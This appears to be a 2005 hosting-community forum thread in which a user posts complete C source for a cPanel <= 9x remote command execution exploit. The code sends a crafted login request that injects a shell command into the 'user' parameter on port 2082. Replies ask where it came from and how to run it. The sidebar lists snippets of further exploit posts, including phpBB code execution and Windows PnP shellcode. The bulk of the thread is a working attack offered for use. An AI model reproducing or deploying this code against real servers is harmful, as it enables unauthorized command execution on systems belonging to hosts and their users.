[exploit] Cpanel Versions Below And Equal To 9x
free web hosting
Free Web Hosting, No Ads > CONTRIBUTE > Computers > Computer Security Issues & Exploits

[exploit] Cpanel Versions Below And Equal To 9x

sunny
Sep 1 2005, 04:09 PM
Exploit for cPanel versions below and equal to 9x that takes advantage of a remote command execution vulnerability.

CODE

/*
cPanel <= 9x Remote Command Execution

*/

//headers
#include <stdio.h>//In/Out
#include <winsock2.h>//sockets functions
#include <stdlib.h>//memory functions
#include <string.h>//strlen,strcat,strcpy

#pragma comment(lib,"ws2_32.lib") //for compile with dev-c++ link to "libws2_32.lib"

#define Port 2082 //port for connect to cPanel
#define SIZE 1024 //buffer size to receive the data

/*connect host:port*/
SOCKET Conecta(char *Host, short puerto)
{
/*struct for make the socket*/
WSADATA wsaData;
SOCKET Winsock;//listener socket
/*two structures for connect*/
struct sockaddr_in Winsock_In;
struct hostent *Ip;

/*start the socket*/
WSAStartup(MAKEWORD(2,2), &wsaData);
/*make*/
Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);

//check socket status
if(Winsock==INVALID_SOCKET)
{
/*exit*/
WSACleanup();
return -1;
}

/*complete the struct*/
Ip=gethostbyname(Host);
Winsock_In.sin_port=htons(puerto);
Winsock_In.sin_family=AF_INET;
Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));

/*connect*/
if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{
/*end*/
WSACleanup();
return -1;
}

return Winsock;
}

/*MASTER FUNCTION*/
int main(int argc, char *argv[])
{
/*the socket*/
SOCKET sock;
/*make the evil buffer to send the request*/
char evil_request[]="GET /login/?user=|%22%60";
char evil_request2[]="%60%22\r";
char *evil;
/*to receive the data*/
char buf[SIZE];

printf("\n+[ cPanel <= 9x Remote Command Execution ]+ by Lympex");
printf("\n");
printf("\n-----------------------------------------------------\n");

if(argc!=3)//cPanel_9x_rce.exe <host> <command>
{
printf("\n[+] Usage: %s <host> <command>\n",argv[0]);
return 0;
}

printf("\n[+] Connecting %s:%d...",argv[1],Port);

/*start the exploit*/
sock=Conecta(argv[1],Port);//connect
if(sock==-1)
{
printf("Error\n");
return 1;
}

printf("OK");

/*make the EVIL request*/
evil=(char *) malloc((strlen(argv[2])+24+12)*sizeof(char));
strcpy(evil,evil_request);strcat(evil,argv[2]);strcat(evil,evil_request2);strcat
(evil,"\n\n");

//sends it
send(sock,evil,strlen(evil),0);

buf[recv(sock,buf,SIZE,0)]='\0';

//show the data
printf("\n\n------- [Result] -------\n\n%s\n------- [/Result] -------\n",buf);

WSACleanup();
LocalFree(buf);
LocalFree(evil);
return 0;
}

 

 

 


Reply

thablkpanda
Sep 1 2005, 08:41 PM
Interesting, where'd you find this, a reputable source or did you hack it yourself?
Panda

Reply

nelimitat
Sep 1 2005, 09:44 PM
That's really curious if he hacked the cpanel by himself. Really appreciate smile.gif


Notice from wassie:
Deleted double post

Reply

Saint_Michael
Sep 2 2005, 10:10 AM
interesting indeed but i don't think we could fix that ourselves since this is free hosting. but still interesting that you found this.

Reply

sunny
Sep 2 2005, 01:06 PM
I have found it on some security portal. It is interresting to know that our faithful cPanel has some vulnerabilities.

One more thing. While I was experimenting with the code, I found out that the server is secure if it is using an updated version of cPanel. And in Trap17's case I am sure that we are secure :-)

Reply

Saint_Michael
Sep 2 2005, 02:07 PM
well with all the hosting account that span 3 websites i think it would have to secure.

Reply

Nileshpatel
Oct 3 2005, 09:27 PM
Hello Sunny,

Can you give step to use this code for Cpanel?

Thanks
nilesh

Reply

X-Zone
Oct 20 2005, 05:35 AM
QUOTE(Nileshpatel @ Oct 3 2005, 09:27 PM)
Hello Sunny,

Can you give step to use this code for Cpanel?

Thanks
nilesh
*



It's C++ , i would imagine you compile then execute it wink.gif

Reply


Got an Opinion! Express your Views! (no registration):-
Add your Reply/ Opinion/ Views/ Comments/ Suggestion/ Questions/ Queries etc.
Posts with decent grammar & English will be accepted and please refrain from profanities.
For asking a Question, We recommend you to sign-up (for free) so that you can track the topic easily.

Nature of your Post*: Opinion/ Reply/ Comments
Question/Query
Feedback to us.
       
Name   Email
Title/Question*

(Maximum characters: 10,000)
You have characters left.
Confirm Code:

Similar Topics

Keywords : exploit, cpanel, versions, equal, 9x

  1. Another New Exploit And One A Few Weeks Ago, We Are All At Risk From These
    A DNS exploit and a clipboard expload believe it or not! (0)
  2. Hack Into Cpanel
    (6)
    I was wondering whether one could hack his way into cPanel and exploit the security loopholes.
    Okay, first of all I would like to clarify my intentions. I have no malicious intention whatsoever
    and I'm not a hacker, i.e. I dunno any programming languages at all. I have a hosting account at
    a certain post to host forum, meaning to say, the admin helped me create a cPanel hosting account. I
    know the username but I dunno the password so I requested it from the admin. He told me and I tried
    it, but still I can't log into my account. I guess the password's wrong.....
  3. Is There An Exploit In Vista Home Premium To Make Firefox Permanant Default Browser?
    (4)
    I just got a new laptop, and of course it's loaded with vista. Everything works awesomly!
    (my last PC was from 2001, BIG DIFF.) But the damned thing compulsivly and automatically sets
    Internet Explorer to my default browser and won't let me change certain things which browsers
    will typically handle. 've manually changed it so Firefox handles all the stuff except HTTPS
    and what not (CANNOT CHANGE W/O HACK!), but IE just bumps in every time I want to click a link
    from a non-browser based file /sad.gif" style="vertical-align:middle" emoid=":(" border="....
  4. Quicktime Zero Day Exploit News And Updates
    (1)
    On monday it was reported that Quicktime 7.2 and 7.3 versions come with a new exploit in which
    malware could on to a person's computer through streaming videos. They only mention that XP and
    Vista are the only affect systems and no word came about on the Mac operating system. They mention
    that a buffer overflow bug was made in which it "contains a stack buffer overflow vulnerability in
    the way Quicktime handles the RTSP Content-Type header." For those who don't know what RTSP is,
    RTSP is the Real-Time Streaming Protocol which apple uses for its QuickTime softw....
  5. Hole In Microsoft Messenger Program Requires A Immediate Update
    For Users of MSN Messenger 6.2, 7.0 and 7.5 versions of MSN Messenger (0)
    SOURCE Well it seems that Microsoft found a huge hole in MSN Messenger that was bad enough that
    they want people to upgrade to the current Messenger which is Live 8.1 or something like that. As
    for details on the problem they just said the following, "..which let hackers embed malicious code
    in Web chat invitations to users." and that they found this problem in "6.2, 7.0 and 7.5, as well as
    Windows Live Messenger 8.0." Although it was interesting to know that people were actually
    complaining about Live Messenger being a resource hog, well the last time I check msn w....
  6. Windows Vista Less Secure Than Older Versions?
    (7)
    my brother has windows vista and told me that it is safer than other versions of windows but
    according to other people they say that it has bugs and other stuff whick one of these are true?....
  7. Zero-day Firefox Exploit
    (5)
    Link to Article: http://news.com.com/Hackers+claim+zero-day..._3-6121608.html Thought this was
    interesting. Really caught me offgaurd, didn't expect such a huge flaw on a GPL based program.
    Whats even more scary is they said they have about 30 other flaws found.......
  8. Cpanel Exploit
    security hole in cPanel to hack the servers of a hosting company (8)
    A pair days ago I read this new on Slashdot: cPanel Exploit Used to Circulate IE Exploit
    QUOTE "In a dangerous combination of unpatched exploits, hackers have used a previously
    undiscovered security hole in cPanel to hack the servers of a hosting company and use hundreds of
    hijacked sites to infect Internet Explorer users with malware using the unpatched VML exploit.
    cPanel, whose hosting automation software is used by many large hosting companies, has issued a fix.
    It's a local exploit, meaning the attacker must control a cPanel account on the target hosti....
  9. Attention All Ipb Users/admin
    Important exploit discovered! (6)
    Invision Power Board v2.1.6 © 2006 IPS, Inc. This is what it is written on the bottom of the
    board. Not so long ago, i was surfing somewhere, (i wont say where) and i discovered a "sql
    injection"exploit, a perl script. QUOTE(step28 in the hack) 28. Reload and click on the
    username to the admin. You are now logged in as an ADMIN!!! Admins, pm to receive
    the link where i found this. with this hack, you can log in with any user without his pass.
    It's really easy to do, you just need PERL, Opera webbrowser and 3 minutes fo your life... ....
  10. Windows Xp Pro Exploit: Permission Setup Allows Access To Task Manager During Login
    even if permissions deny this abiltity. (1)
    A friend of mine was temporarily banned from the computers at my school a while ago after he
    accidentially found a way into Task Manager, which is disabled on our network. He has had his
    permissions restored now, but has no idea why he got banned in the first place. However, recently he
    explained what he did to me, and I tested it. I soon found out that, by accident, we had both
    discovered that there is a Security Exploit in networking Windows XP Professional. The exploit is
    to do with network permissions. Windows XP recieves the permission data from the network as soon....
  11. Firefox Exploit
    (0)
    QUOTE Earlier this week, I blogged about a site doing a bunch of different exploits, depending
    on what you are running. One of the things the site will do is detect if you have Firefox, and
    attempt to exploit it, using the InstallVersion.compareTo() vulnerability. Read More with
    images Already found to be copying and pasting. Take this time to review our forum rules. Warning.
    ....
  12. Serious Wmf Windows Exploit
    No-one is safe right now (16)
    This has blown up big time in the last 3 days: http://www.f-secure.com/weblog/ ....
  13. Latest Ie Exploit
    does anyone still use this browser? (10)
    For Internet Explorer users, please note that there is a new exploit in the wild that is capable of
    compromising a fully patched and updated WinXP machine:
    http://www.eweek.com/article2/0,1759,18917...3119TX1K0000594 Microsoft has not released a fix yet.
    From the article: QUOTE IE users should immediately disable Active Scripting via the Tools >
    Internet Options > Security tab > Custom Level feature. Firefox and other alternative web
    browsers are not affected. You would have to be tricked into going to a malicious website to have
    any chance of being affecte....
  14. [exploit] Phpbb <=2.0.12 Vulnerability.
    How to be Admin on phpBB in Simple steps (2)
    Another vulnerability in PHPbb based forums that can be used to easily gain any user level access to
    the forum. Even the admin account is not not secure with the default setup. Click Here for more
    details about -"How to be Admin on phpBB in Simple steps!" And here is the Homepage of
    PHPbb and click here to download the latest version.....
  15. Online Scams Exploit Katrina Disaster
    (10)
    In the wake of hurricane Katrina, several online scams have begun to circulate the Internet,
    according to several security firms. Sophos warned users on Thursday not to open a malware-Infected
    e-mail posing as news on the disaster. Possible subject lines of the e-mail could be QUOTE
    "Re: g8 Tropical storm flooded New Orleans", "Re: g7 80 percent of our city underwater", and "Re:
    q1 Katrina killed as many as 80 people". The group said there could be additional variants.
    BetaNews on Thursday morning had received a variant of the above e-mails, however it app....
  16. [exploit] Microsoft Server Message Block
    (SMB) Remote Exploit (MS05-011) (0)
    Microsoft Server Message Block (SMB) Remote Exploit (MS05-011) /* * Windows SMB Client
    Transaction Response Handling * * MS05-011 * CAN-2005-0045 * * This works against Win2k * *
    cybertronic gmx net * http://www.livejournal.com/users/cybertronic/ * * usage: * gcc -o mssmb_poc
    mssmb_poc.c * ./mssmb_poc * * connect via \\ip * and hit the netbios folder! * *
    ***STOP: 0x00000050 (0xF115B000,0x00000001,0xFAF24690, * 0x00000000) * PAGE_FAULT_IN_NONPAGED_AREA *
    * The Client reboots immediately * * Technical Details: * ----------------- * * The driver MRXSMB.S....
  17. [exploit] Microsoft Internet Explorer Com Objects
    File Download Exploit (MS05-038) (0)
    Microsoft Internet Explorer COM Objects File Download Exploit (MS05-038)
    /*+++++++++++++++++++++++++++++++++++++++++++++++ Ms05 038 exploit POC Write By ZwelL 2005 8 11
    http://www.donews.net/zwell zwell@sohu.com Some code belongs to Lion(cnhonker), regards to him.
    This code tested on Windows 2003 -----------------------------------------------*/ #include
    #include #pragma comment(lib, "ws2_32") // Use for find the ASM code #define PROC_BEGIN __asm
    _emit 0x90 __asm _emit 0x90\ __asm _emit 0x90 __asm _emit 0x90\ __asm _emit 0x90 __asm
    _emit 0x90\....
  18. [exploit] Phpbb 2.0.15 "viewtopic.php"
    Remote PHP Code Execution Exploit (3)
    phpBB 2.0.15 "viewtopic.php" Remote PHP Code Execution Exploit #!/usr/bin/pyth0n print
    "\nphpBB 2.0.15 arbitrary command execution eXploit" print " 2005 by rattle@awarenetwork.org"
    print " well, just because there is none." import sys from urllib2 import Request, urlopen from
    urlparse import urlparse, urlunparse from urllib import quote as quote_plus INITTAG = ' '
    ENDTAG = ' ' def makecmd(cmd): return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd
    ,'chr(%d)'%ord(cmd )) _ex = "%sviewtopic.php?t=%s&highlight=%%27." _ex += ....
  19. [exploit] Microsoft Windows 2000 Plug And Play
    Universal Exploit (0)
    Microsoft Windows 2000 Plug and Play Universal Remote Exploit (MS05-039) /* Windows 2000
    universal exploit for MS05-039 -\x6d\x35\x6c\x30\x6e\x6e\x79- */
    #include #include #include #include #include #include #include #pragma comment(lib,
    "mpr") #pragma comment(lib, "Rpcrt4") BYTE Data1 =
    {0x11,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x11,0x00,0x00,0x00,
    0x52,0x00,0x4F,0x00,0x4F,0x00,0x54,0x00,0x5C,0x00,0x53,0x00,
    0x59,0x00,0x53,0x00,0x54,0x00,0x45,0x00,0x4D,0x00,0x5C,0x00,
    0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x00,0x0....
  20. [exploit] Microsoft Windows Remote Desktop Dos
    (0)
    Microsoft Windows Remote Desktop Protocol DoS Exploit (MS05-041) // Windows XP SP2
    'rdpwd.sys' Remote Kernel DoS // // Discovered by: // Tom Ferris // tommy
    security-protocols com // // Tested on: // Microsoft Windows XP SP2 // // Usage (SPIKE) :
    ./generic_send_tcp 192.168.1.100 3389 remoteass.spk 1 0 // // 8/9/2005 Security-Protocols.com // //
    This program is free software; you can redistribute it and/or modify it under // the terms of the
    GNU General Public License version 2, 1991 as published by // the Free Software Foundation.
    s_block_start("packet_1....
  21. [exploit] Microsoft Windows 2000 Plug And Play
    (1)
    Microsoft Windows 2000 Plug and Play Universal Remote Exploit #2 (MS05-039) /*
    HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2 * * Copyright © 2005 houseofdabus. * * (MS05-039)
    Microsoft Windows Plug-and-Play Service Remote Overflow * Universal Exploit + no crash shellcode * *
    .:: ::. * * --------------------------------------------------------------------- * Description: * A
    remote code execution and local elevation of privilege * vulnerability exists in Plug and Play that
    could allow an * attacker who successfully exploited this vulnerability to take * complete con....
  22. [exploit] Sun Solaris "printd" Daemon
    Remote Arbitrary File Deletion (0)
    ## # This file is part of the Metasploit Framework and may be redistributed # according to the
    licenses defined in the Authors field below. In the # case of an unknown or missing license, this
    file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest #
    version of the Framework can always be obtained from metasploit.com. ## package
    Msf::Exploit::solaris_lpd_unlink; use base "Msf::Exploit"; use IO::Socket; use IO::Select; use
    strict; use Pex::Text; my $advanced = { }; my $info = { 'Name' => 'Solaris
    LPD Arbit....
  23. Ms Internet Explorer Com Objects File Dl Exploit
    (1)
    another internet explorer aecurity hole! /blink.gif' border='0' style='vertical-align:middle'
    alt='blink.gif' /> here 's the exploit : http://www.milw0rm.com/id.php?id=1148 ....
  24. Microsoft Windows Plug-and-play Exploit
    (0)
    wow, you can get this famous vulnerabilty exploit here: http://www.milw0rm.com/id.php?id=1149
    have fun /smile.gif' border='0' style='vertical-align:middle' alt='smile.gif' /> ....
  25. Phpbb Exploit
    (17)
    Recently, an exploit has been found out that allows people to use their cookies to gain access to
    the ACP. And Firefox assists with it /ohmy.gif' border='0' style='vertical-align:middle'
    alt='ohmy.gif' /> ! Basically what happens that is when you visitthe phpBB forum, it logs a
    cookie containing your Session ID (Basically who and when you are). What it does, after much
    decoding and encoding, is allows you to replace your SID with the admin's, thus enabling them to
    gain access. To fix this, upgrade to the latest version of phpBB, 2.0.13. Dun dun dunnnnn! B....
  26. Phpbb Exploit
    PhbBB exploits unleashed! (4)
    /laugh.gif' border='0' style='vertical-align:middle' alt='laugh.gif' /> hello Oh
    !!!!! agian PHPBB exploits & bugs phpbb team must /laugh.gif' border='0'
    style='vertical-align:middle' alt='laugh.gif' /> dead check here
    http://k-otik.com/exploits/20050228.phpbbsession.c.php /wink.gif' border='0'
    style='vertical-align:middle' alt='wink.gif' /> for more security use IPB OR VBULLETIN
    /unsure.gif' border='0' style='vertical-align:middle' alt='unsure.gif' /> Thanks Best REgars ,
    liridonahm EDIT : PHPBB EXPLOITS, Trap17 is not responsible ....


      27. Looking for exploit, cpanel, versions, equal, 9x

*RANDOM STUFF*





*SIMILAR VIDEOS*
Searching Video's for exploit, cpanel, versions, equal, 9x

*MORE FROM TRAP17.COM*
Similar
Another New Exploit And One A Few Weeks Ago, We Are All At Risk From These - A DNS exploit and a clipboard expload believe it or not!
Hack Into Cpanel
Is There An Exploit In Vista Home Premium To Make Firefox Permanant Default Browser?
Quicktime Zero Day Exploit News And Updates
Hole In Microsoft Messenger Program Requires A Immediate Update - For Users of MSN Messenger 6.2, 7.0 and 7.5 versions of MSN Messenger
Windows Vista Less Secure Than Older Versions?
Zero-day Firefox Exploit
Cpanel Exploit - security hole in cPanel to hack the servers of a hosting company
Attention All Ipb Users/admin - Important exploit discovered!
Windows Xp Pro Exploit: Permission Setup Allows Access To Task Manager During Login - even if permissions deny this abiltity.
Firefox Exploit
Serious Wmf Windows Exploit - No-one is safe right now
Latest Ie Exploit - does anyone still use this browser?
[exploit] Phpbb <=2.0.12 Vulnerability. - How to be Admin on phpBB in Simple steps
Online Scams Exploit Katrina Disaster
[exploit] Microsoft Server Message Block - (SMB) Remote Exploit (MS05-011)
[exploit] Microsoft Internet Explorer Com Objects - File Download Exploit (MS05-038)
[exploit] Phpbb 2.0.15 "viewtopic.php" - Remote PHP Code Execution Exploit
[exploit] Microsoft Windows 2000 Plug And Play - Universal Exploit
[exploit] Microsoft Windows Remote Desktop Dos
[exploit] Microsoft Windows 2000 Plug And Play
[exploit] Sun Solaris "printd" Daemon - Remote Arbitrary File Deletion
Ms Internet Explorer Com Objects File Dl Exploit
Microsoft Windows Plug-and-play Exploit
Phpbb Exploit
Phpbb Exploit - PhbBB exploits unleashed!
advertisement



[exploit] Cpanel Versions Below And Equal To 9x



 

 

 

 

ADD REPLY / Got an Opinion! a humble request :-) RAPID SEARCH! Free Hosting [X]
Express your Opinions, Thoughts or Contribute more info. to help others.
Ask your Doubts & Queries to get answers, So that "Together We can help others!" 		Register FREE for AD-FREE forum, Create your own topics, Ask Questions, track topics, setup subscriptions & notifications and Get a Free Website w/ Email and FTP.
500MB Space *No Ads*, CPanel, FTP, PHP, MySQL, EMails - 100% FREE